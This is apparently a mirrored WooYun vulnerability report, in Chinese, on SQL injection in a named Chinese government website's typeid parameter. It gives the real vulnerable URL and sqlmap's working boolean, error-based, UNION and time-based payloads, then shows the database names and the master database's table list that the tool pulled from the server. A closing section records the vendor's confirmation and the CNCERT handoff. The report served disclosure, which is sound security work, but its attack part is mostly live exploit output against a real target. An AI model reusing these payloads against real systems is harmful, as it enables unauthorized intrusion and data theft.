乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-12: 细节已通知厂商并且等待厂商处理中 2015-05-15: 厂商已经确认,细节仅向厂商公开 2015-05-25: 细节向核心白帽子及相关领域专家公开 2015-06-04: 细节向普通白帽子公开 2015-06-14: 细节向实习白帽子公开 2015-06-29: 细节向公众公开
参数没过滤注入点为http://www.wsfgj.gov.cn/ws_web/newlist.aspx?typeid=13
Place: GETParameter: typeid Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) Payload: typeid=(SELECT (CASE WHEN (7498=7498) THEN 13 ELSE 7498*(SELECT 7498 FROM master..sysdatabases) END)) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: typeid=13 AND 9865=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(101)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (9865=9865) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(115)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: typeid=-7980 UNION ALL SELECT CHAR(113)+CHAR(115)+CHAR(101)+CHAR(99)+CHAR(113)+CHAR(81)+CHAR(84)+CHAR(72)+CHAR(83)+CHAR(116)+CHAR(101)+CHAR(73)+CHAR(109)+CHAR(67)+CHAR(122)+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(115)+CHAR(113),NULL,NULL-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: typeid=13 AND 9762=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)---[15:50:16] [INFO] testing Microsoft SQL Server[15:50:16] [INFO] confirming Microsoft SQL Server[15:50:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[15:50:17] [INFO] fetching database names[15:50:18] [INFO] the SQL query used returns 11 entries[15:50:18] [INFO] retrieved: "fwcq"[15:50:18] [INFO] retrieved: "ls0815"[15:50:18] [INFO] retrieved: "master"[15:50:19] [INFO] retrieved: "model"[15:50:19] [INFO] retrieved: "msdb"[15:50:19] [INFO] retrieved: "ReportServer"[15:50:20] [INFO] retrieved: "ReportServerTempDB"[15:50:20] [INFO] retrieved: "tempdb"[15:50:20] [INFO] retrieved: "ts_web_dremis_old"[15:50:20] [INFO] retrieved: "ts_web_dremis_old"[15:50:21] [INFO] retrieved: "ws_dremis"
Database: master [289 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views || sys.allocation_units || sys.assemblies || sys.assembly_files || sys.assembly_modules || sys.assembly_references || sys.assembly_types || sys.asymmetric_keys || sys.backup_devices || sys.certificates || sys.check_constraints || sys.column_type_usages || sys.column_xml_schema_collection_usages || sys.columns || sys.computed_columns || sys.configurations || sys.conversation_endpoints || sys.conversation_groups || sys.credentials || sys.crypt_properties || sys.data_spaces || sys.database_files || sys.database_mirroring_endpoints || sys.database_mirroring_endpoints || sys.database_mirroring_witnesses || sys.database_permissions || sys.database_principal_aliases || sys.database_principals || sys.database_recovery_status || sys.database_role_members || sys.databases || sys.default_constraints || sys.destination_data_spaces || sys.dm_broker_activated_tasks || sys.dm_broker_connections || sys.dm_broker_forwarded_messages || sys.dm_broker_queue_monitors || sys.dm_clr_appdomains || sys.dm_clr_loaded_assemblies || sys.dm_clr_properties || sys.dm_clr_tasks || sys.dm_db_file_space_usage || sys.dm_db_index_usage_stats || sys.dm_db_mirroring_connections || sys.dm_db_missing_index_details || sys.dm_db_missing_index_group_stats || sys.dm_db_missing_index_groups || sys.dm_db_partition_stats || sys.dm_db_session_space_usage || sys.dm_db_task_space_usage || sys.dm_exec_background_job_queue_stats || sys.dm_exec_background_job_queue_stats || sys.dm_exec_cached_plans || sys.dm_exec_connections || sys.dm_exec_query_optimizer_info || sys.dm_exec_query_stats || sys.dm_exec_query_transformation_stats || sys.dm_exec_requests || sys.dm_exec_sessions || sys.dm_fts_active_catalogs || sys.dm_fts_index_population || sys.dm_fts_memory_buffers || sys.dm_fts_memory_pools || sys.dm_fts_population_ranges || sys.dm_io_backup_tapes || sys.dm_io_cluster_shared_drives || sys.dm_io_pending_io_requests || sys.dm_os_buffer_descriptors || sys.dm_os_child_instances || sys.dm_os_cluster_nodes || sys.dm_os_hosts || sys.dm_os_latch_stats || sys.dm_os_loaded_modules || sys.dm_os_memory_allocations || sys.dm_os_memory_cache_clock_hands || sys.dm_os_memory_cache_counters || sys.dm_os_memory_cache_entries || sys.dm_os_memory_cache_hash_tables || sys.dm_os_memory_clerks || sys.dm_os_memory_objects || sys.dm_os_memory_pools || sys.dm_os_performance_counters || sys.dm_os_ring_buffers || sys.dm_os_schedulers || sys.dm_os_stacks || sys.dm_os_sublatches || sys.dm_os_sys_info || sys.dm_os_tasks || sys.dm_os_threads || sys.dm_os_virtual_address_dump || sys.dm_os_wait_stats || sys.dm_os_waiting_tasks || sys.dm_os_worker_local_storage || sys.dm_os_workers || sys.dm_qn_subscriptions || sys.dm_repl_articles || sys.dm_repl_schemas || sys.dm_repl_tranhash || sys.dm_repl_traninfo || sys.dm_tran_active_snapshot_database_transactions || sys.dm_tran_active_transactions || sys.dm_tran_current_snapshot || sys.dm_tran_current_transaction || sys.dm_tran_database_transactions || sys.dm_tran_locks || sys.dm_tran_session_transactions || sys.dm_tran_top_version_generators || sys.dm_tran_transactions_snapshot || sys.dm_tran_version_store || sys.endpoint_webmethods || sys.endpoints || sys.event_notification_event_types || sys.event_notifications || sys.events || sys.extended_procedures || sys.extended_properties || sys.filegroups || sys.foreign_key_columns || sys.foreign_keys || sys.fulltext_catalogs || sys.fulltext_document_types || sys.fulltext_index_catalog_usages || sys.fulltext_index_columns || sys.fulltext_indexes || sys.fulltext_languages || sys.http_endpoints || sys.identity_columns || sys.index_columns || sys.indexes || sys.internal_tables || sys.key_constraints || sys.key_encryptions || sys.linked_logins || sys.login_token || sys.master_files || sys.master_key_passwords || sys.message_type_xml_schema_collection_usages || sys.messages || sys.module_assembly_usages || sys.numbered_procedure_parameters || sys.numbered_procedures || sys.objects || sys.openkeys || sys.parameter_type_usages || sys.parameter_xml_schema_collection_usages || sys.parameters || sys.partition_functions || sys.partition_parameters || sys.partition_range_values || sys.partition_schemes || sys.partitions || sys.plan_guides || sys.procedures || sys.remote_logins || sys.remote_service_bindings || sys.routes || sys.schemas || sys.securable_classes || sys.server_assembly_modules || sys.server_event_notifications || sys.server_events || sys.server_permissions || sys.server_principals || sys.server_role_members || sys.server_sql_modules || sys.server_trigger_events || sys.server_triggers || sys.servers || sys.service_broker_endpoints || sys.service_contract_message_usages || sys.service_contract_usages || sys.service_contracts || sys.service_message_types || sys.service_queue_usages || sys.service_queues || sys.services || sys.soap_endpoints || sys.sql_dependencies || sys.sql_logins || sys.sql_modules || sys.stats_columns || sys.stats_columns || sys.symmetric_keys || sys.synonyms || sys.sysaltfiles || sys.syscacheobjects || sys.syscharsets || sys.syscolumns || sys.syscomments || sys.sysconfigures || sys.sysconstraints || sys.syscurconfigs || sys.syscursorcolumns || sys.syscursorrefs || sys.syscursors || sys.syscursortables || sys.sysdatabases || sys.sysdepends || sys.sysdevices || sys.sysfilegroups || sys.sysfiles || sys.sysforeignkeys || sys.sysfulltextcatalogs || sys.sysindexes || sys.sysindexkeys || sys.syslanguages || sys.syslockinfo || sys.syslogins || sys.sysmembers || sys.sysmessages || sys.sysobjects || sys.sysoledbusers || sys.sysopentapes || sys.sysperfinfo || sys.syspermissions || sys.sysprocesses || sys.sysprotects || sys.sysreferences || sys.sysremotelogins || sys.syssegments || sys.sysservers || sys.system_columns || sys.system_components_surface_area_configuration || sys.system_internals_allocation_units || sys.system_internals_partition_columns || sys.system_internals_partitions || sys.system_objects || sys.system_parameters || sys.system_sql_modules || sys.system_views || sys.systypes || sys.sysusers || sys.tables || sys.tcp_endpoints || sys.trace_categories || sys.trace_columns || sys.trace_event_bindings || sys.trace_events || sys.trace_subclass_values || sys.traces || sys.transmission_queue || sys.trigger_events || sys.triggers || sys.type_assembly_usages || sys.types || sys.user_token || sys.via_endpoints || sys.views || sys.xml_indexes || sys.xml_schema_attributes || sys.xml_schema_collections || sys.xml_schema_component_placements || sys.xml_schema_components || sys.xml_schema_elements || sys.xml_schema_facets || sys.xml_schema_model_groups || sys.xml_schema_namespaces || sys.xml_schema_types || sys.xml_schema_wildcard_namespaces || sys.xml_schema_wildcards
如上
危害不大,建议还是处理下
危害等级:中
漏洞Rank:8
确认时间:2015-05-15 17:39
CNVD未直接复现所述情况,已经转由CNCERT下发山东分中心,由其后续协调网站管理单位处置。
暂无